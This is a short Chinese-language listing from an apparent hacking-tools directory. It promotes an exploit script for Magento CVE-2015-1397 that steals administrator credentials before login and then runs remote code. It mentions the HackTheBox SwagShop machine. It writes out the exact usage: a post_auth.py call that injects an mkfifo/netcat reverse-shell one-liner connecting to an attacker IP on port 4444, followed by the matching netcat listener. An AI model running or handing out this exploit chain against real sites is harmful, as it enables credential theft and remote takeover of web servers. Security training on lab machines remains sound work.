黑客、渗透测试和网络安全工具,武装您的安全武器库!
Magento CMS 中 CVE-2015-1397 的漏洞利用脚本,包括获取管理员凭据的预认证漏洞利用和用于反向 shell 执行的后认证 RCE 模块。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
漏洞详情
漏洞出现在 HackTheBox 的 SwagShop 中
获取 Magento CMS 管理后台的管理员凭据
将 exploit.py 获取的凭据添加到 post_auth.py 后,运行:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
监听器:
nc -lvnp 4444